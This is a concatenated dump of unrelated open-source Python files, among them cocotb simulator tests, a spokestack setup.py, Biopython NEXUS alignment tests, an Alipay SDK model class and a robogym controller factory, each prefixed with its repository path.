dut.mybits.value.binstr.lower() == "01"
), "The assigned value was not as expected"
else:
assert (
dut.mybits.value.binstr.lower() == "00"
), "The assigned value was incorrect"
@cocotb.test(
# Icarus up to (and including) 10.3 doesn't support bit-selects, see https://github.com/steveicarus/iverilog/issues/323
expect_error=IndexError
if (
cocotb.SIM_NAME.lower().startswith("icarus")
and (IcarusVersion(cocotb.SIM_VERSION) <= IcarusVersion("10.3 (stable)"))
)
else (),
skip=cocotb.LANGUAGE in ["vhdl"],
)
async def access_single_bit(dut):
"""Access a single bit in a vector of the DUT"""
dut.stream_in_data.value = 0
await Timer(1, "ns")
dut.stream_in_data[2].value = 1
await Timer(1, "ns")
assert dut.stream_out_data_comb.value.integer == (1 << 2)
@cocotb.test()
async def access_single_bit_erroneous(dut):
"""Access a non-existent single bit"""
with pytest.raises(IndexError):
dut.stream_in_data[100000]
# Riviera discovers integers as nets (gh-2597)
# GHDL discovers integers as nets (gh-2596)
# Icarus does not support integer signals (gh-2598)
@cocotb.test(
expect_error=AttributeError
if cocotb.SIM_NAME.lower().startswith(("icarus", "chronologic simulation vcs"))
else (),
expect_fail=(
cocotb.SIM_NAME.lower().startswith("riviera")
and cocotb.LANGUAGE in ["verilog"]
or cocotb.SIM_NAME.lower().startswith("ghdl")
),
)
async def access_integer(dut):
"""Integer should show as an IntegerObject"""
assert isinstance(dut.stream_in_int, IntegerObject)
with pytest.raises(IndexError):
dut.stream_in_int[3]
assert len(dut.stream_in_int) == 1
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_ulogic(dut):
"""Access a std_ulogic as enum"""
dut.stream_in_valid
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_constant_integer(dut):
"""
Access a constant integer
"""
assert isinstance(dut.isample_module1.EXAMPLE_WIDTH, ConstantObject)
assert dut.isample_module1.EXAMPLE_WIDTH == 7
# GHDL inexplicably crashes, so we will skip this test for now
# likely has to do with overall poor support of string over the VPI
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"] or cocotb.SIM_NAME.lower().startswith("ghdl")
)
async def access_constant_string_vhdl(dut):
"""Access to a string, both constant and signal."""
constant_string = dut.isample_module1.EXAMPLE_STRING
assert isinstance(constant_string, ConstantObject)
assert constant_string.value == b"TESTING"
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_writing_string_undersized(dut):
test_string = b"cocotb"
dut.stream_in_string.setimmediatevalue(test_string)
assert dut.stream_out_string == b""
await Timer(1, "ns")
assert dut.stream_out_string.value == test_string
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_writing_string_oversized(dut):
test_string = b"longer_than_the_array"
dut.stream_in_string.setimmediatevalue(test_string)
await Timer(1, "ns")
assert dut.stream_out_string.value == test_string[: len(dut.stream_out_string)]
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_read_single_character(dut):
test_string = b"cocotb!!!"
idx = 3
dut.stream_in_string.setimmediatevalue(test_string)
await Timer(1, "ns")
# String is defined as string(1 to 8) so idx=3 will access the 3rd character
assert dut.stream_out_string[idx].value == test_string[idx - 1]
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_write_single_character(dut):
# set initial value
test_string = b"verilog0"
dut.stream_in_string.setimmediatevalue(test_string)
await Timer(1, "ns")
# iterate over each character handle and uppercase it
for c in dut.stream_in_string:
lowercase = chr(c)
uppercase = lowercase.upper()
uppercase_as_int = ord(uppercase)
c.setimmediatevalue(uppercase_as_int)
await Timer(1, "ns")
# test the output is uppercased
assert dut.stream_out_string.value == test_string.upper()
# TODO: add tests for Verilog "string_input_port" and "STRING_LOCALPARAM" (see issue #802)
@cocotb.test(
skip=cocotb.LANGUAGE in ["vhdl"] or cocotb.SIM_NAME.lower().startswith("riviera"),
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (),
)
async def access_const_string_verilog(dut):
"""Access to a const Verilog string."""
await Timer(10, "ns")
assert isinstance(dut.STRING_CONST, StringObject)
assert dut.STRING_CONST == b"TESTING_CONST"
dut.STRING_CONST.value = b"MODIFIED"
await Timer(10, "ns")
assert dut.STRING_CONST != b"TESTING_CONST"
@cocotb.test(
skip=cocotb.LANGUAGE in ["vhdl"],
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (),
)
async def access_var_string_verilog(dut):
"""Access to a var Verilog string."""
await Timer(10, "ns")
assert isinstance(dut.STRING_VAR, StringObject)
assert dut.STRING_VAR == b"TESTING_VAR"
dut.STRING_VAR.value = b"MODIFIED"
await Timer(10, "ns")
assert dut.STRING_VAR == b"MODIFIED"
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_constant_boolean(dut):
"""Test access to a constant boolean"""
assert isinstance(dut.isample_module1.EXAMPLE_BOOL, ConstantObject)
assert dut.isample_module1.EXAMPLE_BOOL.value == True # noqa
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_boolean(dut):
"""Test access to a boolean"""
with pytest.raises(IndexError):
dut.stream_in_bool[3]
assert len(dut.stream_in_bool) == 1
curr_val = dut.stream_in_bool.value
dut.stream_in_bool.setimmediatevalue(not curr_val)
await Timer(1, "ns")
assert curr_val != dut.stream_out_bool.value
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def access_internal_register_array(dut):
"""Test access to an internal register array"""
assert (
dut.register_array[0].value.binstr == "xxxxxxxx"
), "Failed to access internal register array value"
dut.register_array[1].setimmediatevalue(4)
await Timer(1, "ns")
assert (
dut.register_array[1].value == 4
), "Failed to set internal register array value"
@cocotb.test(
skip=cocotb.LANGUAGE in ["vhdl"],
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (),
)
async def access_gate(dut):
"""
Test access to a gate Object
"""
assert isinstance(dut.test_and_gate, HierarchyObject)
# GHDL is unable to access record types (gh-2591)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def custom_type(dut):
"""
Test iteration over a custom type
"""
expected_sub = 84
expected_top = 4
count = 0
def _discover(obj):
iter_count = 0
for elem in obj:
iter_count += 1
iter_count += _discover(elem)
return iter_count
for sub in dut.cosLut:
sub_count = _discover(sub)
assert sub_count == expected_sub
count += 1
assert expected_top == count
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def type_check_verilog(dut):
"""
Test if types are recognized
"""
test_handles = [
(dut.stream_in_ready, "GPI_REGISTER"),
(dut.register_array, "GPI_ARRAY"),
(dut.temp, "GPI_REGISTER"),
(dut.and_output, "GPI_NET"),
(dut.stream_in_data, "GPI_NET"),
(dut.logic_b, "GPI_REGISTER"),
(dut.logic_c, "GPI_REGISTER"),
(dut.INT_PARAM, "GPI_INTEGER"),
(dut.REAL_PARAM, "GPI_REAL"),
(dut.STRING_PARAM, "GPI_STRING"),
]
if cocotb.SIM_NAME.lower().startswith("icarus"):
test_handles.append(
(dut.logic_a, "GPI_NET")
) # https://github.com/steveicarus/iverilog/issues/312
else:
test_handles.append((dut.logic_a, "GPI_REGISTER"))
for handle in test_handles:
assert handle[0]._type == handle[1]
|
setup.py | spokestack/spokestack-python | 139 | 12634812 | import os
import subprocess
import sys
from setuptools import Extension, find_packages, setup
from setuptools.command.build_py import build_py
try:
from numpy import get_include
except ImportError:
subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy==1.19.2"])
from numpy import get_include
try:
from Cython.Build import cythonize
except ImportError:
subprocess.check_call([sys.executable, "-m", "pip", "install", "Cython==0.29.22"])
from Cython.Build import cythonize
class CustomBuild(build_py): # type: ignore
"""Custom build command to build PortAudio."""
def run(self) -> None:
"""Custom run function that builds and installs PortAudio/PyAudio."""
if sys.platform == "mingw":
# build with MinGW for windows
command = ["./configure && make && make install"]
elif sys.platform in ["win32", "win64"]:
# win32/64 users should install the PyAudio wheel or Conda package
command = None
else:
# macos or linux
command = ["./configure && make"]
if command:
# build PortAudio with system specific command
subprocess.run(
command,
shell=True,
check=True,
cwd="spokestack/extensions/portaudio",
)
# install PyAudio after PortAudio has been built
subprocess.run(
[sys.executable, "-m", "pip", "install", "pyaudio"],
shell=True,
check=True,
)
# run the normal build process
build_py.run(self)
SOURCES = [
os.path.join("spokestack/extensions/webrtc", source)
for source in [
"filter_audio/other/complex_bit_reverse.c",
"filter_audio/other/complex_fft.c",
"filter_audio/other/copy_set_operations.c",
"filter_audio/other/cross_correlation.c",
"filter_audio/other/division_operations.c",
"filter_audio/other/dot_product_with_scale.c",
"filter_audio/other/downsample_fast.c",
"filter_audio/other/energy.c",
"filter_audio/other/get_scaling_square.c",
"filter_audio/other/min_max_operations.c",
"filter_audio/other/real_fft.c",
"filter_audio/other/resample_by_2.c",
"filter_audio/other/resample_by_2_internal.c",
"filter_audio/other/resample_fractional.c",
"filter_audio/other/resample_48khz.c",
"filter_audio/other/spl_init.c",
"filter_audio/other/spl_sqrt.c",
"filter_audio/other/spl_sqrt_floor.c",
"filter_audio/other/vector_scaling_operations.c",
"filter_audio/vad/vad_core.c",
"filter_audio/vad/vad_filterbank.c",
"filter_audio/vad/vad_gmm.c",
"filter_audio/vad/vad_sp.c",
"filter_audio/vad/webrtc_vad.c",
"filter_audio/agc/analog_agc.c",
"filter_audio/agc/digital_agc.c",
"filter_audio/ns/nsx_core.c",
"filter_audio/ns/nsx_core_c.c",
"filter_audio/ns/noise_suppression_x.c",
]
]
EXTENSIONS = [
Extension(
"spokestack.extensions.webrtc.agc",
["spokestack/extensions/webrtc/agc.pyx"] + SOURCES,
include_dirs=["filter_audio/agc/include/"],
),
Extension(
"spokestack.extensions.webrtc.nsx",
["spokestack/extensions/webrtc/nsx.pyx"] + SOURCES,
include_dirs=["filter_audio/ns/include/"],
),
Extension(
"spokestack.extensions.webrtc.vad",
["spokestack/extensions/webrtc/vad.pyx"] + SOURCES,
include_dirs=["filter_audio/agc/include/"],
),
]
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="spokestack",
version="0.0.23",
author="Spokestack",
author_email="<EMAIL>",
description="Spokestack Library for Python",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/spokestack/spokestack-python",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
setup_requires=["setuptools", "wheel", "numpy==1.19.2", "Cython>=0.29.22"],
install_requires=[
"numpy==1.19.2",
"Cython>=0.29.22",
"websocket_client",
"tokenizers",
"requests",
],
ext_modules=cythonize(EXTENSIONS),
include_dirs=[get_include()],
cmdclass={"build_py": CustomBuild},
zip_safe=False,
)
|
lightning_transformers/__init__.py | mariomeissner/lightning-transformers | 451 | 12634816 | """Root package info."""
import os
__ROOT_DIR__ = os.path.dirname(os.path.dirname(__file__))
__version__ = "0.1.0"
__author__ = "PyTorchLightning et al."
__author_email__ = "<EMAIL>"
__license__ = "Apache-2.0"
__copyright__ = f"Copyright (c) 2020-2020, {__author__}."
__homepage__ = "https://github.com/PyTorchLightning/lightning-transformers"
__docs__ = "PyTorch Lightning Transformers."
__long_doc__ = """
Flexible interface for high performance research using SOTA Transformers leveraging PyTorch Lightning,
Transformers, and Hydra.
Transformers are increasingly popular for SOTA deep learning, gaining traction in NLP with BERT-based architectures,
more recently transcending into the world of Computer Vision and Audio Processing.
However, training and fine-tuning transformers at scale is not trivial and can vary from domain to domain requiring
additional research effort, and significant engineering.
Lightning Transformers gives researchers a way to train HuggingFace Transformer models with all the features
of PyTorch Lightning, while leveraging Hydra to provide composability of blocks and configs to focus on research.
"""
|
alipay/aop/api/domain/AlipayOverseasOpenPreorderCreateModel.py | antopen/alipay-sdk-python-all | 213 | 12634825 | <reponame>antopen/alipay-sdk-python-all<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.TuitionISVAgentInfoDTO import TuitionISVAgentInfoDTO
from alipay.aop.api.domain.TuitionISVPayerInfoDTO import TuitionISVPayerInfoDTO
from alipay.aop.api.domain.TuitionISVRequestPaymentInfoDTO import TuitionISVRequestPaymentInfoDTO
from alipay.aop.api.domain.TuitionISVStudentInfoDTO import TuitionISVStudentInfoDTO
class AlipayOverseasOpenPreorderCreateModel(object):
def __init__(self):
self._agent_info = None
self._finish_self_audit = None
self._payer_info = None
self._payment_info = None
self._pre_order_id = None
self._student_info = None
@property
def agent_info(self):
return self._agent_info
@agent_info.setter
def agent_info(self, value):
if isinstance(value, TuitionISVAgentInfoDTO):
self._agent_info = value
else:
self._agent_info = TuitionISVAgentInfoDTO.from_alipay_dict(value)
@property
def finish_self_audit(self):
return self._finish_self_audit
@finish_self_audit.setter
def finish_self_audit(self, value):
self._finish_self_audit = value
@property
def payer_info(self):
return self._payer_info
@payer_info.setter
def payer_info(self, value):
if isinstance(value, TuitionISVPayerInfoDTO):
self._payer_info = value
else:
self._payer_info = TuitionISVPayerInfoDTO.from_alipay_dict(value)
@property
def payment_info(self):
return self._payment_info
@payment_info.setter
def payment_info(self, value):
if isinstance(value, TuitionISVRequestPaymentInfoDTO):
self._payment_info = value
else:
self._payment_info = TuitionISVRequestPaymentInfoDTO.from_alipay_dict(value)
@property
def pre_order_id(self):
return self._pre_order_id
@pre_order_id.setter
def pre_order_id(self, value):
self._pre_order_id = value
@property
def student_info(self):
return self._student_info
@student_info.setter
def student_info(self, value):
if isinstance(value, TuitionISVStudentInfoDTO):
self._student_info = value
else:
self._student_info = TuitionISVStudentInfoDTO.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.agent_info:
if hasattr(self.agent_info, 'to_alipay_dict'):
params['agent_info'] = self.agent_info.to_alipay_dict()
else:
params['agent_info'] = self.agent_info
if self.finish_self_audit:
if hasattr(self.finish_self_audit, 'to_alipay_dict'):
params['finish_self_audit'] = self.finish_self_audit.to_alipay_dict()
else:
params['finish_self_audit'] = self.finish_self_audit
if self.payer_info:
if hasattr(self.payer_info, 'to_alipay_dict'):
params['payer_info'] = self.payer_info.to_alipay_dict()
else:
params['payer_info'] = self.payer_info
if self.payment_info:
if hasattr(self.payment_info, 'to_alipay_dict'):
params['payment_info'] = self.payment_info.to_alipay_dict()
else:
params['payment_info'] = self.payment_info
if self.pre_order_id:
if hasattr(self.pre_order_id, 'to_alipay_dict'):
params['pre_order_id'] = self.pre_order_id.to_alipay_dict()
else:
params['pre_order_id'] = self.pre_order_id
if self.student_info:
if hasattr(self.student_info, 'to_alipay_dict'):
params['student_info'] = self.student_info.to_alipay_dict()
else:
params['student_info'] = self.student_info
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOverseasOpenPreorderCreateModel()
if 'agent_info' in d:
o.agent_info = d['agent_info']
if 'finish_self_audit' in d:
o.finish_self_audit = d['finish_self_audit']
if 'payer_info' in d:
o.payer_info = d['payer_info']
if 'payment_info' in d:
o.payment_info = d['payment_info']
if 'pre_order_id' in d:
o.pre_order_id = d['pre_order_id']
if 'student_info' in d:
o.student_info = d['student_info']
return o
|
examples/pxScene2d/external/breakpad-chrome_55/gyp/test/win/gyptest-link-update-manifest.py | madanagopaltcomcast/pxCore | 2,151 | 12634829 | <filename>examples/pxScene2d/external/breakpad-chrome_55/gyp/test/win/gyptest-link-update-manifest.py
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure binary is relinked when manifest settings are changed.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
import pywintypes
import win32api
import winerror
RT_MANIFEST = 24
class LoadLibrary(object):
"""Context manager for loading and releasing binaries in Windows.
Yields the handle of the binary loaded."""
def __init__(self, path):
self._path = path
self._handle = None
def __enter__(self):
self._handle = win32api.LoadLibrary(self._path)
return self._handle
def __exit__(self, type, value, traceback):
win32api.FreeLibrary(self._handle)
def extract_manifest(path, resource_name):
"""Reads manifest from |path| and returns it as a string.
    Returns None if there is no such manifest."""
with LoadLibrary(path) as handle:
try:
return win32api.LoadResource(handle, RT_MANIFEST, resource_name)
except pywintypes.error as error:
if error.args[0] == winerror.ERROR_RESOURCE_DATA_NOT_FOUND:
return None
else:
raise
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
gyp_template = '''
{
'targets': [
{
'target_name': 'test_update_manifest',
'type': 'executable',
'sources': ['hello.cc'],
'msvs_settings': {
'VCLinkerTool': {
'EnableUAC': 'true',
'UACExecutionLevel': '%(uac_execution_level)d',
},
'VCManifestTool': {
'EmbedManifest': 'true',
'AdditionalManifestFiles': '%(additional_manifest_files)s',
},
},
},
],
}
'''
gypfile = 'update-manifest.gyp'
def WriteAndUpdate(uac_execution_level, additional_manifest_files, do_build):
with open(os.path.join(CHDIR, gypfile), 'wb') as f:
f.write(gyp_template % {
'uac_execution_level': uac_execution_level,
'additional_manifest_files': additional_manifest_files,
})
test.run_gyp(gypfile, chdir=CHDIR)
if do_build:
test.build(gypfile, chdir=CHDIR)
exe_file = test.built_file_path('test_update_manifest.exe', chdir=CHDIR)
return extract_manifest(exe_file, 1)
manifest = WriteAndUpdate(0, '', True)
test.fail_test('asInvoker' not in manifest)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' in manifest)
# Make sure that updating .gyp and regenerating doesn't cause a rebuild.
WriteAndUpdate(0, '', False)
test.up_to_date(gypfile, test.ALL, chdir=CHDIR)
# But make sure that changing a manifest property does cause a relink.
manifest = WriteAndUpdate(2, '', True)
test.fail_test('requireAdministrator' not in manifest)
# Adding a manifest causes a rebuild.
manifest = WriteAndUpdate(2, 'extra.manifest', True)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' not in manifest)
|
systemdlogger/systemdlogger.py | techjacker/systemdlogger | 102 | 12634835 | #!/usr/bin/env python3
import argparse
from systemdlogger.runner import Runner
def main():
parser = argparse.ArgumentParser(
description=(
'Exports systemd logs to different storage backends'
', eg cloudwatch/elasticsearch.'
)
)
parser.add_argument(
'config',
type=str,
help='path to config file'
)
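    # Example invocation (command name and config path are illustrative):
    #     systemdlogger /etc/systemdlogger/config.json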
args = parser.parse_args()
runner = Runner(
config_path=args.config
)
runner.run()
if __name__ == '__main__':
main()
|
Tests/test_Align_nexus.py | lukasz-kozlowski/biopython | 2,856 | 12634848 | # Copyright 2021 by <NAME>. All rights reserved.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for Bio.Align.nexus module."""
import unittest
from io import StringIO
from Bio.Align.nexus import AlignmentIterator, AlignmentWriter
try:
import numpy
except ImportError:
from Bio import MissingPythonDependencyError
raise MissingPythonDependencyError(
"Install numpy if you want to use Bio.Align.nexus."
) from None
class TestNexusReading(unittest.TestCase):
def check_reading_writing(self, path):
alignments = AlignmentIterator(path)
stream = StringIO()
writer = AlignmentWriter(stream)
n = writer.write_file(alignments)
self.assertEqual(n, 1)
alignments = AlignmentIterator(path)
alignments = list(alignments)
alignment = alignments[0]
stream.seek(0)
saved_alignments = AlignmentIterator(stream)
saved_alignments = list(saved_alignments)
self.assertEqual(len(alignments), len(saved_alignments))
saved_alignment = saved_alignments[0]
for i, (sequence, saved_sequence) in enumerate(
zip(alignment.sequences, saved_alignment.sequences)
):
self.assertEqual(sequence.id, saved_sequence.id)
self.assertEqual(sequence.seq, saved_sequence.seq)
self.assertEqual(sequence.annotations, saved_sequence.annotations)
self.assertEqual(alignment[i], saved_alignment[i])
self.assertTrue(
numpy.array_equal(alignment.coordinates, saved_alignment.coordinates)
)
def test_nexus1(self):
path = "Nexus/test_Nexus_input.nex"
with open(path) as stream:
alignments = AlignmentIterator(stream)
alignments = list(alignments)
self.assertEqual(len(alignments), 1)
alignment = alignments[0]
self.assertEqual(len(alignment), 9)
self.assertEqual(alignment.shape, (9, 46))
self.assertEqual(alignment.sequences[0].id, "t1")
self.assertEqual(alignment.sequences[1].id, "t2 the name")
self.assertEqual(alignment.sequences[2].id, "isn'that [a] strange name?")
self.assertEqual(
alignment.sequences[3].id, "one should be punished, for (that)!"
)
self.assertEqual(alignment.sequences[4].id, "t5")
self.assertEqual(alignment.sequences[5].id, "t6")
self.assertEqual(alignment.sequences[6].id, "t7")
self.assertEqual(alignment.sequences[7].id, "t8")
self.assertEqual(alignment.sequences[8].id, "t9")
self.assertEqual(alignment.sequences[0].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[1].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[2].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[3].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[4].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[5].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[6].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[7].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[8].annotations, {"molecule_type": "DNA"})
self.assertEqual(
alignment.sequences[0].seq, "ACGTcgtgtgtgctctttacgtgtgtgctcttt"
)
self.assertEqual(alignment.sequences[1].seq, "ACGcTcgtgtctttacacgtgtcttt")
self.assertEqual(alignment.sequences[2].seq, "ACcGcTcgtgtgtgctacacacgtgtgtgct")
self.assertEqual(alignment.sequences[3].seq, "ACGT")
self.assertEqual(
alignment.sequences[4].seq, "AC?GT?acgt???????????acgt????????"
)
self.assertEqual(
alignment.sequences[5].seq, "AcCaGtTc?aaaaaaaaaaacgactac?aaaaaaaaaa"
)
self.assertEqual(
alignment.sequences[6].seq, "A?CGgTgggggggggggggg???gggggggggggggggg"
)
self.assertEqual(
alignment.sequences[7].seq, "AtCtGtTtttttttttttt??ttttttttttttttttttt??"
)
self.assertEqual(
alignment.sequences[8].seq, "cccccccccccccccccccNcccccccccccccccccccccNcc"
)
self.assertTrue(
numpy.array_equal(
alignment.coordinates,
numpy.array(
[
                        [0, 1, 1, 2, 2, 3, 3, 4, 5, 6, 8, 12, 13, 14, 16, 16, 17, 17, 18, 18, 18, 18, 19, 20, 21, 23, 27, 28, 29, 31, 31, 32, 32, 33],
                        [0, 1, 1, 2, 2, 3, 4, 5, 6, 7, 9, 9, 9, 10, 12, 12, 13, 13, 14, 14, 14, 16, 17, 18, 19, 21, 21, 21, 22, 24, 24, 25, 25, 26],
                        [0, 1, 1, 2, 3, 4, 5, 6, 7, 8, 10, 14, 15, 16, 16, 16, 16, 16, 16, 16, 18, 20, 21, 22, 23, 25, 29, 30, 31, 31, 31, 31, 31, 31],
                        [0, 1, 1, 2, 2, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4],
                        [0, 1, 1, 2, 3, 4, 4, 5, 6, 6, 8, 12, 12, 13, 15, 15, 16, 17, 18, 18, 20, 20, 20, 21, 21, 23, 27, 27, 28, 30, 30, 31, 32, 33],
                        [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 13, 14, 15, 17, 17, 18, 18, 19, 21, 23, 25, 26, 27, 28, 28, 32, 33, 34, 36, 36, 37, 37, 38],
                        [0, 1, 2, 3, 3, 4, 5, 6, 7, 8, 10, 14, 15, 16, 18, 18, 19, 19, 20, 22, 22, 24, 25, 26, 27, 29, 33, 34, 35, 37, 37, 38, 38, 39],
                        [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 15, 16, 17, 19, 19, 20, 20, 21, 23, 25, 27, 28, 29, 30, 32, 36, 37, 38, 40, 40, 41, 41, 42],
                        [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 15, 16, 17, 19, 20, 21, 21, 22, 24, 26, 28, 29, 30, 31, 33, 37, 38, 39, 41, 42, 43, 43, 44],
]
),
)
)
self.assertEqual(
alignment[0],
"A-C-G-Tcgtgtgtgctct-t-t------acgtgtgtgctct-t-t",
)
self.assertEqual(
alignment[1],
"A-C-GcTcgtg-----tct-t-t----acacgtg-----tct-t-t",
)
self.assertEqual(alignment[2], "A-CcGcTcgtgtgtgct--------acacacgtgtgtgct------")
self.assertEqual(alignment[3], "A-C-G-T---------------------------------------")
self.assertEqual(alignment[4], "A-C?G-T?-acgt??-???-???--??---?-acgt??-???-???")
self.assertEqual(alignment[5], "AcCaGtTc?--aaaaaaaa-a-aacgactac?--aaaaaaaa-a-a")
self.assertEqual(alignment[6], "A?C-GgTgggggggggggg-g-g??--?gggggggggggggg-g-g")
self.assertEqual(alignment[7], "AtCtGtTtttttttttttt-?-?ttttttttttttttttttt-?-?")
self.assertEqual(alignment[8], "cccccccccccccccccccNc-ccccccccccccccccccccNc-c")
self.check_reading_writing(path)
def test_nexus2(self):
path = "Nexus/codonposset.nex"
with open(path) as stream:
alignments = AlignmentIterator(stream)
alignments = list(alignments)
self.assertEqual(len(alignments), 1)
alignment = alignments[0]
self.assertEqual(len(alignment), 2)
self.assertEqual(alignment.shape, (2, 22))
self.assertEqual(alignment.sequences[0].id, "Aegotheles")
self.assertEqual(alignment.sequences[1].id, "Aerodramus")
self.assertEqual(alignment.sequences[0].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[1].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[0].seq, "AAAAAGGCATTGTGGTGGGAAT")
self.assertEqual(alignment.sequences[1].seq, "?????????TTGTGGTGGGAAT")
self.assertTrue(
numpy.array_equal(alignment.coordinates, numpy.array([[0, 22], [0, 22]]))
)
self.assertEqual(alignment[0], "AAAAAGGCATTGTGGTGGGAAT")
self.assertEqual(alignment[1], "?????????TTGTGGTGGGAAT")
self.check_reading_writing(path)
class TestNexusBasic(unittest.TestCase):
def test_empty(self):
import io
stream = io.StringIO()
with self.assertRaisesRegex(ValueError, "Empty file."):
AlignmentIterator(stream)
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
tests/checks/test_blank_row.py | jdaviscooke/goodtables-py | 243 | 12634871 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from goodtables.checks.blank_row import blank_row
import goodtables.cells
# Check
def test_check_blank_row(log):
cells = [
goodtables.cells.create_cell('name1', 'value', row_number=1),
]
errors = blank_row(cells)
assert log(errors) == []
assert len(cells) == 1
def test_check_blank_row_problem(log):
cells = [
goodtables.cells.create_cell('name1', '', row_number=1),
]
errors = blank_row(cells)
assert log(errors) == [
(1, None, 'blank-row'),
]
assert len(cells) == 0
|
robogym/robot/factories.py | 0xflotus/robogym | 288 | 12634882 | from typing import Callable, Optional
import numpy as np
from robogym.robot.robot_interface import ControlMode, RobotControlParameters
from robogym.robot.ur16e.mujoco.free_dof_tcp_arm import (
FreeDOFTcpArm,
FreeRollYawTcpArm,
FreeWristTcpArm,
)
from robogym.robot.ur16e.mujoco.simulation.base import ArmSimulationInterface
def build_tcp_controller(
robot_control_params: RobotControlParameters,
simulation: ArmSimulationInterface,
initial_qpos: Optional[np.ndarray],
autostep: bool = False,
) -> FreeDOFTcpArm:
"""
    :param robot_control_params: Robot control parameters; must request a TCP control mode.
    :param simulation: Solver simulation.
    :param initial_qpos: Initial state for the solver robot.
    :param autostep: Whether the robot steps the simulation automatically.
    :return: A TCP-controlled arm matching the requested control mode.
"""
assert robot_control_params.is_tcp_controlled()
robot_cls: Optional[Callable[..., FreeDOFTcpArm]] = None
if robot_control_params.control_mode is ControlMode.TCP_WRIST:
robot_cls = FreeWristTcpArm
elif robot_control_params.control_mode is ControlMode.TCP_ROLL_YAW:
robot_cls = FreeRollYawTcpArm
else:
raise ValueError("Unknown control mode for TCP.")
robot = robot_cls(
simulation=simulation,
initial_qpos=initial_qpos,
robot_control_params=robot_control_params,
autostep=autostep,
)
assert isinstance(robot, FreeDOFTcpArm)
return robot
|
modelchimp/models/__init__.py | samzer/modelchimp-server | 134 | 12634911 | from modelchimp.models.project import Project
from modelchimp.models.membership import Membership
from modelchimp.models.experiment import Experiment
from modelchimp.models.comment import Comment
from modelchimp.models.profile import Profile
from modelchimp.models.user import User
from modelchimp.models.invitation import Invitation
from modelchimp.models.experiment_image import ExperimentImage
from modelchimp.models.experiment_custom_object import ExperimentCustomObject
|
exercises/practice/dot-dsl/dot_dsl_test.py | Stigjb/python | 1,177 | 12634923 | import unittest
from dot_dsl import Graph, Node, Edge, NODE, EDGE, ATTR
class DotDslTest(unittest.TestCase):
def test_empty_graph(self):
g = Graph()
self.assertEqual(g.nodes, [])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {})
def test_graph_with_one_node(self):
g = Graph([
(NODE, "a", {})
])
self.assertEqual(g.nodes, [Node("a", {})])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {})
def test_graph_with_one_node_with_keywords(self):
g = Graph([
(NODE, "a", {"color": "green"})
])
self.assertEqual(g.nodes, [Node("a", {"color": "green"})])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {})
def test_graph_with_one_edge(self):
g = Graph([
